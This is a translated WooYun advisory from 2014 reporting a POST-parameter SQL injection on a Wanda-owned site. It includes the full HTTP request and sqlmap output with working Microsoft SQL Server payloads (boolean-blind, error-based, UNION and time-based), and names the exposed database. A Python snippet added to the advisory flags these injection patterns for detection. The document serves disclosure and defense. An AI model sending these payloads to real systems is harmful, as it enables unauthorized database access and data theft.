
Vulnerability Summary

Defect ID: wooyun-2014-059679

Title: POST injection on a Wanda sub-site

Vendor: Dalian Wanda Group Co., Ltd. (大连万达集团股份有限公司)

Author: Focusstart

Submitted: 2014-05-07 14:12

Fix time: 2014-06-21 14:13

Public disclosure: 2014-06-21 14:13

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure timeline:

2014-05-07: Details sent to the vendor, awaiting vendor handling
2014-05-07: Vendor confirmed; details disclosed to the vendor only
2014-05-17: Details disclosed to core white hats and relevant domain experts
2014-05-27: Details disclosed to regular white hats
2014-06-06: Details disclosed to intern white hats
2014-06-21: Details disclosed to the public

Brief description:

POST injection on a Wanda sub-site

Detailed description:

Address: www.dagexing.com
POST /order/checkGroupBuyCode.action HTTP/1.1
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=E5ABCE2EE25E063B1FDF0753DBB8F24A.jvm1
Host: www.dagexing.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
code='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(121)%2bCHAR(75)%2bCHAR(73)%2bCHAR(107)%2bCHAR(50)%2bCHAR(102)%2bCHAR(49)%2bCHAR(101))%20FROM%20syscolumns)%2b'
Place: POST
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(75)+CHAR(73)+CHAR(107)+CHAR(50)+CHAR(102)+CHAR(49)+CHAR(101)) FROM syscolumns)+'' AND 9020=9020 AND 'ucso'='ucso
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: code=-4383' OR 2409=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(121)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (2409=2409) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(110)+CHAR(106)+CHAR(113))) AND 'AbGg'='AbGg
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: code=-3140' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(121)+CHAR(119)+CHAR(113)+CHAR(107)+CHAR(89)+CHAR(117)+CHAR(101)+CHAR(68)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(110)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: code=-3547' OR 1350=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'wccJ'='wccJ
---
web application technology: Apache
back-end DBMS: Microsoft SQL Server 2008
Database: KTV_MMS
[132 tables]
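As an added detection example (my own code, not part of the report or the vendor's application), the following Python decodes an x-www-form-urlencoded body and flags the T-SQL injection indicators visible in the sqlmap output above. The two suspicious request bodies are taken verbatim from the report; the benign code value and the regex patterns are my assumptions about what a real group-buy code looks like and what is worth flagging.

```python
import re
from urllib.parse import parse_qs

# Sample request bodies. The first two are the encoded body and the time-based
# payload quoted in the report above; the third is a constructed benign code.
REPORT_BODY = ("code='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)"
               "%2bCHAR(121)%2bCHAR(75)%2bCHAR(73)%2bCHAR(107)%2bCHAR(50)"
               "%2bCHAR(102)%2bCHAR(49)%2bCHAR(101))%20FROM%20syscolumns)%2b'")
HEAVY_BODY = ("code=-3547' OR 1350=(SELECT COUNT(*) FROM sysusers AS sys1,"
              "sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,"
              "sysusers AS sys6,sysusers AS sys7) AND 'wccJ'='wccJ")
BENIGN_BODY = "code=WD20140507A"  # constructed; assumed shape of a real coupon code

# Indicators derived from the four sqlmap techniques in the report (T-SQL flavour).
# The patterns themselves are my own assumptions about what is worth flagging.
INDICATORS = {
    "quote_breakout": re.compile(r"'\s*(\+|\bor\b|\band\b|\bunion\b)", re.I),
    "convert_int":    re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "char_concat":    re.compile(r"\bchar\s*\(\s*\d+\s*\)\s*\+\s*char\s*\(", re.I),
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "system_catalog": re.compile(r"\b(syscolumns|sysusers|sysobjects)\b", re.I),
    "heavy_query":    re.compile(r"count\s*\(\s*\*\s*\)\s+from\s+sysusers\s+as\s+\w+\s*,", re.I),
}


def decode_code_param(body: str) -> str:
    """Return the decoded `code` value from an x-www-form-urlencoded body ('' if absent)."""
    # parse_qs percent-decodes, so %2b becomes '+' and %2c becomes ',' before matching.
    return parse_qs(body, keep_blank_values=True).get("code", [""])[0]


def inspect(body: str) -> dict:
    """Decode the body and list which injection indicators the `code` value matches."""
    value = decode_code_param(body)
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    return {"code": value, "hits": hits, "suspicious": bool(hits)}


if __name__ == "__main__":
    for label, body in (("report", REPORT_BODY), ("heavy", HEAVY_BODY), ("benign", BENIGN_BODY)):
        result = inspect(body)
        print(f"{label:7s} suspicious={result['suspicious']} hits={result['hits']}")
```

Matching is done on the decoded value, so the percent-encoded form in the report's request and the plain form in the sqlmap payload lines trigger the same indicators.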

Proof of vulnerability:

See above.

Remediation:

Null

Copyright notice: please credit the source when reposting: Focusstart@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2014-05-07 22:59

Vendor reply:

Thanks to Focusstart for the attention and contribution. On inspection this vulnerability appears to exist. We will forward it to the back-end team for remediation right away. Thank you!

Latest status:

None yet